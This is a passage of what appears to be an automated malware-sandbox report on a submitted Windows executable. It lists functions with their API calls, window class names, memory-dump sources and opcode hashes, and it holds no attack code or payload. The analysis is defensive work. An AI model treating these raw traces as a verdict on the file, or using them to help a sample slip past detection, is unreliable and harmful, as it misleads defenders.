                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: DestroyWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3375834691-2298589950
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00450F30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00450FBE
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00450FD0
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00450FF7
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Listbox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f8bdfa72bd4b22370308dc8fb5b43ecc467bc5707d551c5fc0c092e20a2863ec
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d9029e3eeac9ad8766667a3aea07e0c59127720085ab11677635d2d0d4ec897e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8bdfa72bd4b22370308dc8fb5b43ecc467bc5707d551c5fc0c092e20a2863ec
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C221A9762002056BEB20DF64DC85FDB3369EB99725F10471AF924A72D1C3B4EC45C764
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1682464887-234962358
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1682464887-234962358
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2507767853-234962358
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2507767853-234962358
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: crts
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 943502515-3724388283
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$LabelVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2006950084-234962358
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
